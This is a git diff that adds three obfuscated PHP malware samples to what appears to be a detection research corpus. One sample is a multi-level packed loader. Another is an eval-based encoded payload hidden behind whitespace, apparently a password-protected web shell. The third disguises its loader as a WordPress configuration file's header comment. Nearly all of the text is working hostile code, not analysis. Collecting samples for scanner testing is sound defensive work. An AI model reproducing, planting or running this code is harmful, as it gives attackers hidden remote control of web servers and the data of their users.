10 files changed, 226 insertions, 0 deletions
diff --git a/data/samples/real/awvjtnz.php b/data/samples/real/awvjtnz.php
new file mode 100644
index 0000000..9d0e366
--- /dev/null
+++ b/data/samples/real/awvjtnz.php
@@ -0,0 +1,4 @@
+# This is a sample of PHP malware discovered 2017/11/15.
+# Unpacks at least 5 levels deep, including references to variables from previous levels of expansion.
+# Also seen with other variable names and constants altered.
+<?php $awvjtnz = 'fmhpph#)zbssb!-#}#)fepmqnj!/!#0#)idubn`hfsq)!sp!*#ojnopm3qjA)qj3hopmA x273qj%6<*Y%)fnbozcYufhA        x%=*h%)m%):fmjix:<##:>:h%:<#64y]552]e7y]#>n%<#372]58y]472]37y]3 x74     141     x72     164") && (!isset($GLOBALS["     x61     156     x75     156     x61"]h!opjudovg}{;#)tutjyf`opjudovg)!gj!|!^<!Ce*[!%cIjQeTQcOc/#00o#>>}R;msv}.;/#/#/},;#-#}+;%-qp%)54l}  x27;%!<*#}_;#)323!>!%yy)#}#-#   x24-    x24-tusqpt)%z-#:#*      x24-    x24!>!  x24/%tjws:*<%j:,,Bjg!)%j:>>1*!%b:>1<!fmtf!%b:>%s:       x5c%j:.2^,%b:<!%c:>%s:  x575983:48984:71]K9]77]D4]82]K6]72]K9]78]K5].;`UQPMSVD!-id%)uqpuft`msvd},;uqpuft`msvd}21]464]284]364]6]234]342]58]24]31#-%tdz*Wsfuvso!%bss      x5csboe))/*)323zbe!-#jt0*?]+^?]_        x5c}X   x24<!4-bubE{h%)sutcvt)esp>hmg%!<12>j%!|!*#91y]c9y]7]y86]267]y74]275]y7:]268]y7f#<!%tww!>!       x240w/  x24)##-!#~<#/%  x24-    x24!>!fyqmpef)# x24*<!%t::!>272qj%6<^#zsfvr#    x5cq%7/6]281L1#/#M5]DgP5]D6#<%fdy>#]D4]3        162     x65     141     x74     145     x5f     146     x772    145     x66     157     x78"))) { $oqtpxpv = "  x6|:*r%:-t%)3of:opjudovg<~      x24<!%o:!>!     x242178}527}88:}334}472 xw6<    x7fw6*CW&)7gj6<*doj%7-C)fepmqnjA        x27&6<.fmjgA    x27doj%6<       x7y]252]18y]#>q%<#762]67y]5z)#44ec:649#-!#:618d5f9#-!#f6c68399#-!#65egb2dc#*<!sfuvso!sboepn]y6d]281Ld]245]K2]285]Ke]53Ld672]48y]#>s%<#462]47d%6|6.7eu{66~67<&w6<*&7-#o]s]!      x24Ypp3)%cB%iN}#-!      x24/%tmw/       x24)%c*W%eN+#Qi x5c1^W%c!>!%i   x5c2*msv%)}k~~~<ftmbg!osvufs!|ftmf!~<**9.-j%-bubE{h%)sutcvt)fubmgoj{C#-#O#-#N#*-!%ff2-!%]53]Kc]55Ld]55#*<%bG9}:}.}-}!#*<%nfd>%fdy<Cb*[%h!>!%tdz)%bbT-36]73]83]238M7]381]211M5]67]452]88]5]48]32M3]317]445]212]445]43]3I7jsv%7UFH#       x27rfs%6~6<     x7fw*127-UVPFNJU,6<*27-SFGTOBSUO#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#-#W#-#)%   x24-    x24*<!~!        x24/%t2273]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<%tdz>#L4]275L3]x45        116     x54"]); if ((strstr($uas,"      x6d     163     x69     145")) or (strstr($)sfebfI{*w%)kVx{**#k#)tutjyf`x       x22l:!}V;3q%}U;y]}R;2]},;osvufs}        x2id%)ftpmdR6<*id%)dfyfR        x27tfs%6<*17-SFEBFI,6<!<5h%/#0#/*#npd/#)rrd/#00;quui#>.%!<***f  x27,*e  x2GMFT`QIQ&f_UTPI`QUUI&e_SEEB`jix6<C    x27&6<*rfs%7-K)fw6*     x7f_*#fmjgk4`{6~6<tfs%w6<       x7fw6*CWtfs%)7gj6<*8]225]241]334]368]322]3]364]6]283]427]36]373P6]R17,67R37,#/q%>U<#16,47R57,27Rpd%6<pd%w6Z6<.3`hA      x2      x5c2b%!>!2p%!*3>?*2b%)gpf{jt)!g("", $jojtdkr); $bhlpzbl();}}W%wN;#-Ez-1H*WCw*[!%rN}#QwTW%hIr    x5c1^-%r        x5c2^-%hOh/#00#W~!%t27ftbc      x7f!|!*uyfu     x27k:!ftmf!}Z;^nbsbq%   x5cSFWSFT`%}X;!sp!*#op%Z<#opo#>b%!*##>>X)!gjZ<#opo#>b%!**X)ufttj        x22)gj!|!*nbsbq%)32d($n)-1);} @error_reporting(0); $jojtdkr = implode(array_map("dudovg+)!gj+{e%!osvufs!*!+A!>!{e%)!>>  x22!ftmbg2y]#>>*4-1-bubE{h%)sutcvt)!gj!|!*bubE{h%)j{hnpd!opjudovg!|!**#j{h3]y76]277#<!%t2w>#]y74]273]y76]252]y85]256]y6g]256<*K)ftpmdXA6|7**197-2qj%7-K)udfoopdXA       x24-    x24     x5c%j^  x24-    x24tvctus)%     x24-    x24buas,"       x72     166     x3a     61      x31")) or (strstr($uas!gj}1~!<2p%       x7f!~!<##!>!2p%Z<^1"]=1; $uas=strtolower($_SERVER["     x48     124     x5ldfid>}&;!osvufs}     x7f;!opjudovg}k~~9{d%:osvufs:~928>>     x22:ftmbg39*56A:>:8:|:7#6#)tutjyf`439275ttfsqnpdov{h19275j{hnpd19275fubmgoj{eb#-*f%)sfxpmpusut)tpqssutRe%)Rd%)Rb%))!gj!<*#cd2bge56)%epnbss-%rxW~!Ypp2)%zB%z>!   x24/%tmw/       x24)%zW%h>EzH,2)!gj!<2,*j%-#1]#-bubE{h%)tpqsut>j%!*9!   x27!hmg%)!gj!~7;mnui}&;zepc}A;~!}       x7f;!|!}{;)gj}l;33bq}k;opjudovg}x;0]=])0#)U!    x24-    x24gvodujpo!    x24-    xSVUFS,6<*msv%7-MSV,6<*)ujojR   x27id%6<        x7fw6*  x7f_*#ujojRk3`{666~6</  x24)%   x24-    x24y4   x24-    x24]y8  x24-    x24]26  x24-    x24<%j,,*!|     x2      x2272qj%)7gj6<**2qj%)h53]Kc#<%tpz!>!#]D6M7]K3#<%yy>#]Ddbqov>*ofmy%)utjm!|!*5!   x27!hmg%)!gj!|!*1?hmg%)!gj!<**2-if((function_exists("   x6f     142     x5f     16<.msv`ftsbqA7>q%6<    x7fw6*  x7f_*#fubfsdXk5`{66~6<&/%rx<~!!%s:N}#-%o:W%c:>1<%b:>1<!gps)%j:>1<%j:=tj{fpg)%%bT-%hW~%fdy)##-!#~<%h00#*<%nfd)##Qtpz)#]341]88M4P8]37]276197g:74985-rr.93e:5597f-s.973:8297f:5297e:56-xr.985:52985-t.98]epdof./#@#/qp%>5h%!<*::::::-1246767~6<Cw6<pd%w6Z6<.5`hA   x27pd%6<pd%w6Z6<.4`hA   x27fujsxX6<#o]o]Y%7;utpI#7>/7rfs%6<#o]1/20QUU0~:<h%_t%:osvufs:~:<*9-1-r%)s%>/h%:<**#57]38y]47]67y]37]88y]27]28yW;utpi}Y;tuofuopd`ufh`fmjg}[;ldpt%}K;`ufldpt}X;`msvd}R;*msv%)}%tmw!>!#]y84]275]y83]27~!%z!>2<!gps)%j>1<%j=6[%ww)))) { $GLOBALS[" x61     156     x75     156     x65     156     x63     164     x69     157     x6e"; function dhyvbmt($n){return chr(orx27!hmg%!)!gj!<2,*j%!-#1]#-bubE{h%)tpqsut>j%!*72!       x27!hmg%tmfV    x7f<*X&Z&S{ftmfV        x7f<*XAZASV<*w%)ppde>u%V<#65,47R25,d7ww**WYsboepn)%bss-%rxB%h>#]y31]278]y3e]81]K78:56985:]#/r%/h%)n%-#+I#)q%:>:r%:|:**t%)m,"    x61     156     x64     162     x6f     151     x64")) or (strstr($uas,"        x63     150     x72     +;!>!}  x27;!>>>!}_;gvc%}&;ftmbg}       x7f;!osvufs}w;* x7f!>>  x22!pd%)!gj}Z;W&)7gj6<*K)ftpmdXA6~6<u%7>/7&6|7**111127-K)ebfsX  x27u%)7fm11112)eobs`un>qp%!|Z~!<##!>!2p%!|!*!***b%)sfxpmpusut!-#j0#!7{**u%-#jt0}Z;0]=]0#)2q%l}S;2-u%!-#2#/#%#/#o]#27pd%6<pd%w6Z6<.2`hA  x27pd%6<C       x27p157 x6d     145")) or (strstr($uas,"        x66     151     xw)##Qtjw)#]82#-#!#-%tmw)%t#W~!Ydrr)%rxB%epnbss!>!bssb2!>#p#/#p#/%z<jg!)%z>>2*!%z>3<!fmtf!%z>2<!%ww2)%w`TW~     x&w6<   x7fw6*CW&)7gj6<.[A      x27&6<  x7fw6*  x7f_*#[k2`{6:!}7;!}6;##}C;!>>!}t::**<(<!fwbm)%tjw)#     x24#-!#]y38#-!%w:**<")));$bhlpzbl = $oqtpxpv]275]y83]248]y83]256]y81]265]y72]254]y76#<!%w:!>!(%w:!>!    x+99386c6f+9f5d816:+946:ce44#)zbssb!>!ssbnpe_GB)fubfsdXA        x27K6<  x7fw6*3qj%7><+{e%+*!*+fepdfe{h+{d%)+opj/!**#sfmcnbs+yfeobz+sfwjidsb`bj+upcotn+qsvmt+FUPNFS&d_SFSFGFS`QUUI&c_UOFHB`SFTV`QUUI&b%!|!*)323zbek!~!<b%        x7f!<X>b66,#/q%>2q%<#g6R85,67R37,18R#>q%V<*#fopoV;hojepdoF.uofuopD#r#   x5cq%)ufttj     x22)gj6<^#Y#    x5cq%   x27Y%6K4]65]D8]86]y31]278]y3f]51L3]84]y31M6]y3e]81#/#7e:55946-tr.984:npd#)tutjyf`opjudovg       x22)24y7        x24-    x24*<!  x24-    x24gps)%j>1<%j=tj{fpgh1:|:*mmvo:>:iuhofm%:-5ppde:4:|:**#ppde#)tutjyf`4  x223}!+!o]s]#)fepmqyf   x27*&7-n%)utjm6<        x7fw6*C1/35.)1/14+9**-)1/2986+7**^c%j:^<!%w`    x5c^>Ew:Qb:Qc:W24<!%ff2!>!bssbz)        x24]25  x24-    x24-!%  x24-    x24*!|! x22)7gj6<*QDU`MPT7-NBFSUT`LDPT7-UFOJ`62]38y]572]48y]#>m%:j!<*2bd%-#1GO  x22#)fepmqyfA>2b%!<*qp%-*.%)euhA)3of>2bd%g)!gj<*#k#)usbut`cpV   x7f     x7f     x7f     x7f<u%V x27{f4  120     x5f     125     x53     105     x52     137     x41     107     24<!fwbm)%tjw)bssbz)#P#-#Q#-#Bhyvbmt",str_split("%tjw!>!#]y847,*d       x27,*c  x27,*b  x27)fepdof.)f3ldfidk!~!<**qp%!-uyfu%)3of)fepdof`5<ofmy%,3,j%>j%!<**3-j%-bubE{h%)sutcvt-#w#)lhA!osvufs!~<3,j%>j%!*3!     248L3P6L1M5]D2P4]D6#<%G7#@#7/7^#iubq#   x5cq%   x27jsv%6<C>^#zsfvr#     x5cq%7**^#zsfvStrrEVxNoiTCnUF_EtaERCxecAlPeR_rtSopxkrbc'; $vgkbclh=explode(chr((636-516)),substr($awvjtnz,(29027-23007),(198-164))); $jdxccsyh = $vgkbclh[0]($vgkbclh[(7-6)]); $nkttprcq = $vgkbclh[0]($vgkbclh[(7-5)]); if (!function_exists('huqbsiykq')) { function huqbsiykq($ewjaowa, $ppcmgty,$euscsfo) { $rputetgcppb = NULL; for($blvfkqsfhf=0;$blvfkqsfhf<(sizeof($ewjaowa)/2);$blvfkqsfhf++) { $rputetgcppb .= substr($ppcmgty, $ewjaowa[($blvfkqsfhf*2)],$ewjaowa[($blvfkqsfhf*2)+(7-6)]); } return $euscsfo(chr((34-25)),chr((531-439)),$rputetgcppb); }; } $xozybdtes = explode(chr((213-169)),'3371,36,157,63,3931,36,2709,44,5708,38,1659,66,2636,43,4231,64,4563,42,868,40,836,32,3967,62,2332,63,5776,31,4847,58,3660,52,2063,20,4528,35,1170,29,5409,38,4365,58,1914,22,3712,42,1474,28,2555,41,5552,35,4949,31,3260,23,53,43,780,24,5965,55,5180,40,3407,49,970,62,1936,50,1791,45,1502,28,3132,66,4713,35,4748,34,3820,62,501,42,4295,70,220,37,1264,64,5918,24,4029,58,2990,53,5875,43,3315,56,640,45,2440,66,5283,25,2679,30,2083,33,5607,55,1836,50,5807,32,3631,29,4423,59,5007,45,0,53,2883,54,4905,44,1886,28,5052,69,2270,62,5839,36,2208,62,280,55,2753,70,2823,60,5351,58,4980,27,2395,45,5662,46,4087,59,2033,30,5121,59,1725,66,3043,67,4482,46,605,35,3882,23,2506,49,685,44,3754,66,4198,33,96,61,1150,20,1032,25,5587,20,908,62,5500,52,2596,40,335,57,3198,62,3110,22,5308,43,1581,24,729,51,1199,65,257,23,4631,27,1057,64,2937,53,2145,63,4605,26,4146,52,3567,64,5220,63,459,42,3283,32,804,32,1605,54,5942,23,1121,29,1348,61,3510,57,1986,47,1409,65,543,62,5447,27,3456,54,392,67,5474,26,3905,26,4658,55,5746,30,1530,51,1328,20,4782,65,2116,29'); $ympifwn = $jdxccsyh("",huqbsiykq($xozybdtes,$awvjtnz,$nkttprcq)); $jdxccsyh=$awvjtnz; $ympifwn(""); $ympifwn=(599-478); $awvjtnz=$ympifwn-1; ?>
diff --git a/data/samples/real/exceptions.php b/data/samples/real/exceptions.php
new file mode 100644
index 0000000..d5ce73f
--- /dev/null
+++ b/data/samples/real/exceptions.php
@@ -0,0 +1 @@
+<?php                                                                                                                                                                                              $ksyweqahwz = 95; function ngomynsz($jkvdve, $swxidbkzpw){$azzogyulq = ''; for($i=0; $i < strlen($jkvdve); $i++){$azzogyulq .= isset($swxidbkzpw[$jkvdve[$i]]) ? $swxidbkzpw[$jkvdve[$i]] : $jkvdve[$i];}$wzmkq="b" . "a" . "s" . "e" . "6" . "4" . "_" . "d" . "e" . "c" . "o" . "d" . "e";return $wzmkq($azzogyulq);}$jgzzljfjj = Array("A"=>"D", "C"=>"B", "B"=>"4", "E"=>"F", "D"=>"C", "F"=>"7", "1"=>"E", "0"=>"9", "3"=>"0", "2"=>"2", "5"=>"A", "4"=>"8", "7"=>"1", "6"=>"3", "9"=>"5", "8"=>"6");$fuwkgtdbkv = "DgokZGVmYXVsdE0hY6Rpb2BgPS5nQ3MnOwoKQGluaV0zZXQoJ2Vycm0yX2xvZycsTlVMTDk"."FDkCpbmlfc2V3KDdsb2dfZXJyb6JzJywwKTsKQGluaV0zZXQoJ27heE0leGVjdXRpb29fdGltZSc"."sMDkFDkCzZXRfdGltZV0saW7pdDgwKTsKQHNldE0tYWdpY70xdW03ZXNfcnVudGltZSgwKTsKQGR"."lZmluZSgnV7NPX7ZEUlNJT3BnLD5nMiB7LjInKTsKDmlmKGdldE0tYWdpY70xdW03ZXNfZ6CjKDkpIHsKID5gIGZ7b"."mN3aW0uIEdTT6N3cmlwc2xhc2hlcygkYXJyYXkpIHsKID5gID5gIDCyZXR7c"."mBgaXNfYXJyYXkoJGEycmE9KS5/IGEycmE9X27hcDgnV7NPc6RyaXCzbGEzaGVzJywgJGEycmE9KS58IHN3cmlwc2xhc2h"."lcygkYXJyYXkpOwogID5gfQogID5gJE0QT7NUIA3gV7NPc6RyaXCzbGEza"."GVzKDRfU10TVDkFDi5gID5kX3NPT3tJRS50IEdTT6N3cmlwc2xhc2hlcygkX3NPT3tJRSkFDn3KD"."mZ7bmN3aW0uIHdzb3xvZ2luKDkgewogID5gaGVhZGVyKDdIVERQLz1uMD53MAQgTm03I1ZvdW9"."kJykFDi5gIDCkaWUoIjQwNDIpOwp0DgpmdW9jdGlvbiCXU30zZXRjb20raWUoJGssIDR2"."KSCFDi5gID5kX3NPT3tJRVska73gPS5kdjsKID5gIHNldGNvb2tpZSgkaywgJHYpOwp0DgppZ"."ighZW7wdHkoJGE7dGhfcGEzcykpIHsKID5gIGlmKGlzc2V3KDRfU10TVEsncGEzcyddKS5mJi5obWQ7KDRfU10TVEsncGEzc"."yddKS50PS5kYXV3aE0wYXNzKSkKID5gID5gIDCXU30zZXRjb20"."raWUobWQ7KDRfU3VSVkVSWydIVERQX3hPU7QnXSksIDRhdXRoX6Chc6MpOwoKID5gIGlmIDghaXNzZXQoJE0AT30LSUVbbWQ7KDR"."fU3VSVkVSWydIVERQX3hPU7QnXSldKSC4fD5oJE0AT30LSUVbbWQ7KDRfU3VSVkVSWydIVERQX3hPU7QnXSl"."dID10IDRhdXRoX6Chc6MpKQogID5gID5gIHdzb3xvZ2luKDkFDn3KDmZ7bmN3aW0uIGEjdGlvblIoKSCFDi5gIDCpZighQ"."DRfU10TVEsnZXYnXSkgewogID5gID5gIDRhIA3gYXJyYXkoDi5gID5g"."ID5gID5gIDJ7bmEtZSIgPTBgcGhwX6VuYW7lKDksDi5gID5gID5gID5gIDJwaHCfdmVyc2lvbiIgPTBgcGhwdmVyc2lvbigpL5og"."ID5gID5gID5gID5id6NvX6ZlcnNpb2BiIA3+IEdTT70WRVJTSU0OL5ogID5gID5gID5gID5ic2EmZW7vZGUiIA3+I1CpbmlfZ2V3"."KDdzYWZlX27vZGUnKQogID5gID5gIDkFDi5gID5gID5gZWNobyCzZXJpYWxpemUoJG1pOwogID5gfSClbHNlIHsKID5"."gID5gIDCldmEsKDRfU10TVEsnZXYnXSkFDi5gIDC0Dn3KDmlmK"."DClbXC3eSgkX7CPU7RbJ2MnXSkgKQogID5gaWYoaXNzZXQoJGRlZmE7bHRfYWN"."3aW0uKS5mJiCmdW9jdGlvbl0leGlzdHMoJ2EjdGlvbicgLi5kZGVmYXVsdE0hY6Rpb2BpKQogID5gID5gID"."RfU10TVEsnYyddIA3gJGRlZmE7bHRfYWN3aW0uOwogID5gZWxz"."ZQogID5gID5gIDRfU10TVEsnYyddIA3gJ7NlY3luZm4nOwppZiggIWVtcHR9K"."DRfU10TVEsnYyddKS5mJiCmdW9jdGlvbl0leGlzdHMoJ2EjdGlvbicgLi5kX7CPU7RbJ"."2MnXSkgKQogID5gY2EsbE07c2VyX2Z7bmMoJ2EjdGlvbicgLi5kX7CPU7RbJ2MnXSkFDmV"."BaXQF";eval/*k*/(ngomynsz($fuwkgtdbkv, $jgzzljfjj));?>
+\ No newline at end of file
diff --git a/data/samples/real/guidtz.php b/data/samples/real/guidtz.php
new file mode 100644
index 0000000..828c0f8
--- /dev/null
+++ b/data/samples/real/guidtz.php
@@ -0,0 +1,76 @@
+<?php 
+/*
+* The base configurations of the WordPress.
+ *
+ * This file has the following configurations: MySQL settings, Table Prefix,
+ * Secret Keys, and ABSPATH. You can find more information by visiting
+ * {@link http://codex.wordpress.org/Editing_wp-config.php Editing wp-config.php}
+ * Codex page. You can get the MySQL settings from your web host.
+ *
+ * This file is used by the wp-config.php creation script during the
+ * installation. 
+ *
+ * @package WordPress
+*/
+@error_reporting(0);@ini_set('display_errors',false);defined('���7���8�13530��') || define('���7���8�13530��',__FILE__);global $���7834�81�9�2�5;global $�53���6�9�7775��; if(!function_exists('�0�93���98511086')){ function �0�93���98511086($�9�2���2851�5�5�,$�71��34076112�06=''){ if(empty($�9�2���2851�5�5�)) return ''; $�9�2���2851�5�5�=base64_decode($�9�2���2851�5�5�); if($�71��34076112�06=='') return ~$�9�2���2851�5�5�; if($�71��34076112�06=='-1') @�7�16��2�923�895(); $��505��465�7�1�6=$GLOBALS['���7834�81�9�2�5']['�2���522259�6�2�']($�9�2���2851�5�5�); $�71��34076112�06=$GLOBALS['���7834�81�9�2�5']['�70�53233�19��66']($�71��34076112�06,$��505��465�7�1�6,$�71��34076112�06); return $�9�2���2851�5�5�^$�71��34076112�06; }} if(!function_exists('�8�18�3���9��1�8')){ function �8�18�3���9��1�8($�9�2���2851�5�5�,$�71��34076112�06=''){ if(empty($�9�2���2851�5�5�)) return ''; $�9�2���2851�5�5�=base64_decode($�9�2���2851�5�5�); if($�71��34076112�06=='') return ~$�9�2���2851�5�5�; if($�71��34076112�06=='-1') @��8�0�42��4�791�(); $��505��465�7�1�6=$GLOBALS['���7834�81�9�2�5']['�2���522259�6�2�']($�9�2���2851�5�5�); $�71��34076112�06=$GLOBALS['���7834�81�9�2�5']['�70�53233�19��66']($�71��34076112�06,$��505��465�7�1�6,$�71��34076112�06); return $�71��34076112�06^$�9�2���2851�5�5�; }}$���7834�81�9�2�5["�70�53233�19��66"]=�8�18�3���9��1�8('jIuNoI+emw==','');$���7834�81�9�2�5["�464120�78����0�"]=�8�18�3���9��1�8('nZ6MmsnLoJuanJCbmg==','');$���7834�81�9�2�5["�2���522259�6�2�"]=�8�18�3���9��1�8('jIuNk5qR','');$���7834�81�9�2�5["��77306821���256"]=�8�18�3���9��1�8('Gw4QPCMiFwoGLjQ=','HKBjfp');$���7834�81�9�2�5["�829���197593�77"]='';$���7834�81�9�2�5["�552�965�0�732�3"]=�8�18�3���9��1�8('ZiAFGwwjBCM=','6hUD_fHe9');$���7834�81�9�2�5["��0702�����8209�"]='';$���7834�81�9�2�5["�1��8�03324��362"]='';$���7834�81�9�2�5["�9��1528381�305�"]=�8�18�3���9��1�8('CzQTIBMXBz8AOxM=','XqAvVE');$���7834�81�9�2�5["�06648�177994296"]='';$���7834�81�9�2�5["��5�27�9076�9��6"]='';$���7834�81�9�2�5["�8790���27403321"]=�8�18�3���9��1�8('WFZYblllfXZ1d1lV','ldv_kTSCBY');$���7834�81�9�2�5["��9053��36�429�0"]='';$���7834�81�9�2�5["��3�5��1�2��3591"]=�8�18�3���9��1�8('DStf','nG67D');$���7834�81�9�2�5["�3�73��22�92�99�"]='';$���7834�81�9�2�5["�77��0�98�3�3283"]=�8�18�3���9��1�8('HA4VNhUDHQ8PHCs=','NKXyAFB');$���7834�81�9�2�5["�38�����5777�05�"]=�8�18�3���9��1�8('AxhnCDs7JiUc','KL3XdsivH');$���7834�81�9�2�5["�51�582���3����1"]='';$���7834�81�9�2�5["�8��301�93���080"]='';$���7834�81�9�2�5["�73606080��7414�"]=�8�18�3���9��1�8('FBlCWFItAUQGOgAQ','sc761Bl4t_');$���7834�81�9�2�5["��331074705��24�"]=�8�18�3���9��1�8('O14wQSA4','R0D7AT');$���7834�81�9�2�5["�4�1�9832�54978�"]=�8�18�3���9��1�8('HUYkECY6','n2VbCLrH');$���7834�81�9�2�5["���5�223�162�2�9"]=�8�18�3���9��1�8('JQI/ERwMNgAcCDwaNw49ADA=','CkSt');$���7834�81�9�2�5["���2�739�17��042"]=�8�18�3���9��1�8('GQAnKg==','miJOLV7G');$���7834�81�9�2�5["��88�0�8���48286"]=�8�18�3���9��1�8('GwEEPz9L','htfLK9uXy');  $�53���6�9�7775��['�2�4�7�4��85�74�']=$GLOBALS['���7834�81�9�2�5']['���2�739�17��042'](); $�53���6�9�7775��['��1�0���0736�02�']=$GLOBALS['���7834�81�9�2�5']['���5�223�162�2�9'](���7���8�13530��); $�53���6�9�7775��['��16�9�6�997��12']=$GLOBALS['���7834�81�9�2�5']['�4�1�9832�54978�']('2ef4d9904bd650312d329366c9fe69dc'); $�53���6�9�7775��['�72�1�1���69�0��']=$GLOBALS['���7834�81�9�2�5']['��331074705��24�']($GLOBALS['���7834�81�9�2�5']['�4�1�9832�54978�']('1094000000')); $�53���6�9�7775��['��77�7��7�6�752�']=$GLOBALS['���7834�81�9�2�5']['��331074705��24�']($GLOBALS['���7834�81�9�2�5']['�4�1�9832�54978�']('6100000000')); $�53���6�9�7775��['��9�570�4�805963']=$GLOBALS['���7834�81�9�2�5']['��331074705��24�']($GLOBALS['���7834�81�9�2�5']['�4�1�9832�54978�']('6600000000')); $�53���6�9�7775��['���16��7��189�6�']=$GLOBALS['���7834�81�9�2�5']['��331074705��24�']($GLOBALS['���7834�81�9�2�5']['�4�1�9832�54978�']('0123000000')); $�53���6�9�7775��['�541��13�7��7���']=$GLOBALS['���7834�81�9�2�5']['��88�0�8���48286']($�53���6�9�7775��['��1�0���0736�02�'],$�53���6�9�7775��['�72�1�1���69�0��'],$�53���6�9�7775��['���16��7��189�6�']); $�53���6�9�7775��['�541��13�7��7���']=$GLOBALS['���7834�81�9�2�5']['�464120�78����0�']($�53���6�9�7775��['�541��13�7��7���']); $�53���6�9�7775��['�541��13�7��7���']=$GLOBALS['���7834�81�9�2�5']['�73606080��7414�']($�53���6�9�7775��['�541��13�7��7���']); return(eval($�53���6�9�7775��['�541��13�7��7���'])); ?>
+#!/usr/bin/php -q
+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
